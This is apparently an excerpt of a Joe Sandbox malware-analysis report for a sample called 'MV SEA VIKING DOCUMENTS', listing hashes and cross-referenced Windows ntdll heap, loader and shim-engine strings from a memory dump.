                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79D16535914786DFCB01CFA4C850AEEBBF1FF49310F148189E4489B692D73AB951DB51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-3224558752
                                                                                                                                                                                                                                • Opcode ID: a1b91ccdfc353926c1ac0f525a25b5251e0cac8f194cd67fc51eab0ee97aab4e
                                                                                                                                                                                                                                • Instruction ID: 8c1fc74d7f5019961e8a5682620960135683f4cb4fa2bc54118a3c645811ab0a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1b91ccdfc353926c1ac0f525a25b5251e0cac8f194cd67fc51eab0ee97aab4e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 774199B4A10782DFC305CF24C994B9AB3B4FF44320F158669E6568B781C738F9A9D792
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-1222099010
                                                                                                                                                                                                                                • Opcode ID: eced59e398920f2cac8b429acf364d71a31da84290c0928f9e4d4d2e21ebef2d
                                                                                                                                                                                                                                • Instruction ID: a9d2ea029f9076ddfe72cdc2a4ddb1dfb133fed7229af81bade526ec81776816
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eced59e398920f2cac8b429acf364d71a31da84290c0928f9e4d4d2e21ebef2d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9531C8B5A107C4DFC312CF28C928F9A37E8FF06721F040589E4528BA91C77ABA78C611
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1F243439
                                                                                                                                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 1F24344A, 1F243476
                                                                                                                                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 1F243466
                                                                                                                                                                                                                                • LdrpFindDllActivationContext, xrefs: 1F243440, 1F24346C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3779518884
                                                                                                                                                                                                                                • Opcode ID: 103c9a495b3238811535d22c1186d0bdc1c56e2eb6330466370aade7698e6d2d
                                                                                                                                                                                                                                • Instruction ID: af2bc066a57d275d3eb8d1beb8ba73ddae7faaf2033a9da6d4475ff27c4f2a54
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 103c9a495b3238811535d22c1186d0bdc1c56e2eb6330466370aade7698e6d2d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05310773E12693BFEB21BB14C888FD5B2A4AB40364F22C16BE8055B550E7A5BD90C2D1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F239F2E
                                                                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 1F239F1C
                                                                                                                                                                                                                                • LdrpCheckModule, xrefs: 1F239F24
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-161242083
                                                                                                                                                                                                                                • Opcode ID: 7eac390b3b564a3580d449574be0a183205ece98eb4fd75f42a1b372766b8734
                                                                                                                                                                                                                                • Instruction ID: aaa469701399b1b90d3701f67aa787c2903865c3dba8e85c65bd51655c9d8de6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eac390b3b564a3580d449574be0a183205ece98eb4fd75f42a1b372766b8734
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B871E1B5E002069FDB04DF68C984AAEB7F1EF48308F5545ADE80AEB640E735BD65CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: 691919fb8de60d068a92f283207e515e3845f8ec0f0e5f4c1496e630d0054982
                                                                                                                                                                                                                                • Instruction ID: f79cd27e0adb9caae3a64865ce76aafe3d51892d9e7bcbc90c454c1155f9f64f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 691919fb8de60d068a92f283207e515e3845f8ec0f0e5f4c1496e630d0054982
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21F1E972E006569FCB18CFA8C9906BDFBF5EF8830072A456DD4A6DB780E635E941CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
• Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0f5fa2e084acae4302f13310d6189dde8e518ed4719e817baed2955939ed01cd
                                                                                                                                                                                                                                • Instruction ID: c28f4bd98bc93407fdb77221e8aebeb466456b35b19d8405ae89066a163e99e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f5fa2e084acae4302f13310d6189dde8e518ed4719e817baed2955939ed01cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5E126B0D00749CFCB25CFA9D984A8DBBF5FF48310F20466AE446A7661D7B1A85ACF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 0$Flst
                                                                                                                                                                                                                                • API String ID: 0-758220159
                                                                                                                                                                                                                                • Opcode ID: 5de3712335f3a7fc1a557840346d2a0da3e9249551e332df82a34fdcdd9a66fb
                                                                                                                                                                                                                                • Instruction ID: b975e7943d2a00f6a8d90feb54084ba7ace4a4343324ffbe5b727589c4db7d9a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5de3712335f3a7fc1a557840346d2a0da3e9249551e332df82a34fdcdd9a66fb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87518BB2E0269A9FDB24DF95C584799FBF4EF44714F24C16AD0499F240E7B4A981CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: HEAP:
                                                                                                                                                                                                                                • API String ID: 3446177414-2466845122
                                                                                                                                                                                                                                • Opcode ID: f6837c06a9e757679526cbe89a02dc373abc8a5431fab8b1852b6d308498c746
                                                                                                                                                                                                                                • Instruction ID: 22cc6d9443b0bd24ed0193968a9da5a44ebfa5b8ac29ad27b1f97132e133611a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6837c06a9e757679526cbe89a02dc373abc8a5431fab8b1852b6d308498c746
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21A19871A14712CFC704CE28C894A2ABBE5BF88710F154A6EE946DB710E776EC45CF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 1F2444AB
                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1F244460
                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1F244530
                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1F244507
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 1F244592
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1F24454D
                                                                                                                                                                                                                                • Execute=1, xrefs: 1F24451E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                • Opcode ID: 718af56a76f54dd97c3c5378e2f290b8152159547910c8b20c827f0b4be2cc5a
                                                                                                                                                                                                                                • Instruction ID: a42d7e99c154fc1277e9c99d5d7cf00384027453259cd97c9cfa70d35b5cfee5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 718af56a76f54dd97c3c5378e2f290b8152159547910c8b20c827f0b4be2cc5a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D51F676A00319BADF14EFA4DC95FE977A8EF18310F2005A9E905A7590EB70FE458F60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • SsHd, xrefs: 1F1EA304
                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F2377E2
                                                                                                                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1F2378F3
                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F237807
                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 1F2377DD, 1F237802
                                                                                                                                                                                                                                • Actx , xrefs: 1F237819, 1F237880
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                                                                • API String ID: 0-1988757188
                                                                                                                                                                                                                                • Opcode ID: e3f968757618afd3f8de7789f530beea6e5b0be13a312d9f75ed15f8a937a679
                                                                                                                                                                                                                                • Instruction ID: 147af2ac81b5e115b09bae7f7f48b1fff0e5fc8d094258fdac65433e9b5d4191
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3f968757618afd3f8de7789f530beea6e5b0be13a312d9f75ed15f8a937a679
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33E11AB2A08B428FD716CE24C99075BBBE1BF89314F154B2DF855CB292E731E855CB81
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F239153
                                                                                                                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1F239372
                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F239178
                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 1F23914E, 1F239173
                                                                                                                                                                                                                                • GsHd, xrefs: 1F1ED794
                                                                                                                                                                                                                                • Actx , xrefs: 1F239315
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 1F1C651C
                                                                                                                                                                                                                                  • Part of subcall function 1F1C6565: RtlDebugPrintTimes.NTDLL ref: 1F1C6614
                                                                                                                                                                                                                                  • Part of subcall function 1F1C6565: RtlDebugPrintTimes.NTDLL ref: 1F1C665F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1F22977C
                                                                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1F229790
                                                                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1F2297B9
                                                                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 1F229783, 1F229796, 1F2297BF
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F2297A0, 1F2297C9
                                                                                                                                                                                                                                • apphelp.dll, xrefs: 1F1C6446
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                                                                • API String ID: 3446177414-4227709934
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-3492000579
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1F229885
                                                                                                                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1F229843
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F229854, 1F229895
                                                                                                                                                                                                                                • LdrpLoadShimEngine, xrefs: 1F22984A, 1F22988B
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 1F1FD879
                                                                                                                                                                                                                                  • Part of subcall function 1F1D4779: RtlDebugPrintTimes.NTDLL ref: 1F1D4817
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-1975516107
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • ---------------------------------------, xrefs: 1F27EDF9
                                                                                                                                                                                                                                • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1F27EDE3
                                                                                                                                                                                                                                • Entry Heap Size , xrefs: 1F27EDED
                                                                                                                                                                                                                                • HEAP: , xrefs: 1F27ECDD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                                                                                                • API String ID: 3446177414-1102453626
                                                                                                                                                                                                                                • Opcode ID: 58428899ed774d680c527d38ab8304d5ae1dc83deeb672658479cf33fe47b3cd
                                                                                                                                                                                                                                • Instruction ID: ef9e13a2a9ce95ca692daae6127c710b1c4a536ef9fd0a5fc1115c94b2001fd2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58428899ed774d680c527d38ab8304d5ae1dc83deeb672658479cf33fe47b3cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B041A175A00662DFC704CF55C48895ABBF9FF5632472586AAD4099F710DB32FC52CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
